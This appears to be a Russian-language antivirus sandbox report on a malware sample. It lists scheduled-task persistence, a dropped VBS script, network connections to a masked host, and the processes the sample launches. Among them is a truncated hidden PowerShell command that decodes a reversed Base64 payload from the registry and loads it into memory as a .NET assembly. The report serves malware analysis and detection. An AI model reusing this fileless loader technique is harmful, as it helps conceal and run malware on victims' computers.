Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\cdkcfxqaiztpyku
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\cdkcfxqaiztpyku.vbs
Сетевая активность
Подключается к
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
UDP
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\cDKCfXqAiZtpYku.VBS"
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command $k='HKCU:\Software\cDKCfXqAiZtpYku';$n='test';$b=[Convert]::FromBase64String((-join((gp $k).$n |%{$_[-1..-($_.Length)]})));[AppDomain]::CurrentDomain.Load($b);[hem.... (со скрытым окном)
- '<SYSTEM32>\taskeng.exe' {0BD9570C-F8EF-4A60-9E94-C987CA76D0BB} S-1-5-21-3691498038-2086406363-2140527554-1000:hlnsabxv\user:Interactive:[1]
- '<SYSTEM32>\wscript.exe' "%APPDATA%\cDKCfXqAiZtpYku.VBS" (со скрытым окном)
